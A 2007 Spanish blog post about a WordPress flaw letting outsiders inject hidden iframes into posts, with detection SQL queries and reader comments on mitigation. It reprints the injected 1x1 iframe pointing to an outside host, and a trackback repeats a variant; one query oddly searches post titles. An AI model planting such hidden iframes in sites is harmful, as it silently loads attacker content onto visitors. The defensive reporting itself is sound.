Nuevo fallo en Wordpress, insercción de iframe

Contenido

Nuevo fallo en Wordpress, insercción de iframe

aNieto2k hace 241 días en: Wordpress, webdev

Eduardo de De Mas Blog, me avisa de que han reportado un nuevo bug de Wordpress, que aún están por corregir, pero que si conocemos podemos estar atentos para controlarlo.

Al parecer el bug, permite aprovecharse de algún exploit que permite insertar en Wordpress un iframe con la siguiente estructura.

<!-- Traffic Statistics -->
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

El problema es que este contenido, aparece dentro del contenido del post, LO HA INTRODUCIDO ALGUIEN AJENO AL BLOG MEDIANTE UN EXPLOIT. Por lo que evidentemente pueden insertar contenido malicioso dentro de nuestros posts, algo realmente delicado.

Por desgracia, esto afecta a varias versiones de Wordpress, incluida la 2.3.1.

Comprobar si ya hemos sido atacados

Para comprobar si ya hemos sido atacados, usaremos phpmyadmin (o similar) para buscar en el contenido de nuestros posts y comentarios (por si acaso) algún indicio de <iframe />

//Comentarios
SELECT *  FROM `PREFIX_comments` WHERE `comment_content` LIKE  ‘%<iframe%;

//Posts
SELECT *  FROM `PREFIX_posts` WHERE `post_title` LIKE  ‘%<iframe%’;

PREFIX, es el prefijo que pusimos al instalar Wordpress.

Compártelo

11 comentarios, 5 referencias

Bug peligroso en WordPress - Alejandro Torres 06/11/2007 09:11
Nuevo fallo en Wordpress | Xtreme News 07/11/2007 01:11
SigT 07/11/2007 02:11
power.org.mx » Blog Archive » Un Fallo más sobre Wordpress y Joomla 08/11/2007 06:11
<!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics ̵ 27/11/2007 03:11

maty

@1 Noviembre 6th, 2007 at 1:19 pm

He mirado y nada. Por si acaso, copia de seguridad actualizada de todos los ficheros a mis discos duros.

Pues eso, no estaría de más que todos hiciesen lo mismo por aquello de que más vale prevenir…

Responder

So Whatz

@2 Noviembre 6th, 2007 at 5:10 pm

Holas,
Me había dado cuenta de esto hace un par de días incluso lo utilice en uno de mis posts en mi blog, pero no veo como un bug permitir incluir iframes en el post. Contrario sería que se pudiera hacer en los comentarios.

En vez de bug yo lo llamaría funcionalidad, en el caso de tener varios autores en tu blog se debería poder restringir el acceso a esas funcionalidades (no se si existe eso ya).

Saludos!

Responder

aNieto2k

@3 Noviembre 6th, 2007 at 5:32 pm

Creo que no me explicado bien, me refiero a que otras personas pueden insertar iframes en nuestro contenido.

Personas sin registrar y ajenas al blog.

Responder

So Whatz

@4 Noviembre 6th, 2007 at 10:16 pm

Ahora me doy cuenta de lo que estás hablando… Yo creo que es más que peligroso el asunto del iframe por el sentido de que se pueden insertar otros codigos al post…

Buen dato

Responder

David Carrero Fdez-Baillo

@5 Noviembre 7th, 2007 at 8:17 am

Usar Mod_security sobre apache es una buena solución de seguridad.

Responder

CalinSoft

@6 Noviembre 8th, 2007 at 8:03 pm

Tendriamos que ver a quienes afecta ese bug… a los que cambiaron el prefijo wp_ por otro o a todos =)… seria buen dato

Responder

Power

@7 Noviembre 8th, 2007 at 8:28 pm

ops.. !!! confundi a Andres con Arturo de Artux dot com dot ar Sorry Andresito por el resbalon, seguimos al pendiente de esta noticia

Responder

WaLhEZ

@8 Noviembre 8th, 2007 at 10:27 pm

Ojala que pronto se encuentre una solucion a este bug, por que estan comprometidos nuestros post.

Responder

hely rojas

@9 Noviembre 27th, 2007 at 10:33 pm

agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas

Responder

Jose Maria

@10 Diciembre 18th, 2007 at 10:31 pm

Buenas noches a todos.
Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de Wordpress.
Es decir, es un exploit que se aprovecha de los permisos de escritura del Wordpress.
Lo hemos solucionado de la siguiente forma:
1- Eliminando las entradas al “iframe” de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el “index.html” del dominio principal)
2- Proteger con contraseña el directorio “wp-admin”
3- Asegurar permisos “chmod”. En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644.

Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio “wp-admin” y eliminamos los permisos de escritura en plugins (*.php y *css)

Un saludo a todos.

Responder

Rub

@11 Abril 18th, 2008 at 8:11 am

Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P

Responder

Enlace permanente: Nuevo fallo en Wordpress, insercción de iframe

Comentar

↑

Información

Proyectos

Foro aNieto2k Resuelve tus dudas sobre Wordpress

heySilver Enriquece tu web con esta versión de QuickSilver

BlogoEdad La edad de los bloggers

Themes en Español Themes para Wordpress Castellano

iMeneame Meneame en tu iPhone

geekTest Demuestra lo Geek que eres

WpAdminThemes Crea y comparte tus propios Admin Themes

Comentarios

Posts más relevantes

Enlaces

aNieto2K Desarrollo web, Wordpress, y alguna cosilla más

Menú

Buscador

Nuevo Anieto2k.com!! descubre
las novedades de esta nueva
versión.

Contenido